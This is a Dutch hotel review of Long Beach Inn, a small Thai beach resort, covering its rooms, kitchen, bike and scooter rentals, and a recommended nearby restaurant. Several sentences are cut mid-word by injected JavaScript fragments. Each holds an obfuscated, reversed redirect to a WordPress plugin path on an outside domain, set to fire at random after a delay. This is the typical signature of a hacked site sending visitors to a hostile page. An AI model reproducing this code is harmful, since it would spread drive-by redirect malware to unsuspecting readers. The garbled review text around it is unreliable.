Long Beach Inn is een klein resort waar het welbevinden van de gast met HOOFDLETTERS geschreven wordt! De Nederlandse eigenaar Bram, die overigens ook een aardig woordje Thais spreek en zijn staff toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doen er alles aan om je verblijf zo prettig mogelijk te laten verlopen.
De kamers zijn ruim en schoon en van alle gemakken voorzien oa. koelkastje en sat. tv voor als er eens een buitje mocht vallen. Het resort beschikt over een zeer goede keuken, waar ook regelmatig gasten van buiten het hotel komen eten.

Gratis fietsen en tegen een kleine vergoeding scooter en zelfs ook een motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor te huur!
Het hotel is aan het einde van een rustig weggetje gelegen op zo’n 250m van het ruime zandstrand.
In de buurt van het hotel bevinden zich diverse mini markets en restaurantjes waarbij in de laatste categorie er een met kop en schouders boven alle andere uitsteekt het heet Meaw Thai Food( 08-31136152). Je vind het toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}door het weggetje af te lopen, links af en op de hoek van het eerste ‘winkeltje’ weer links na 50m aan je rechterhand. Probeer ‘The Big Fisch’ met groene curry, echt onovertroffen!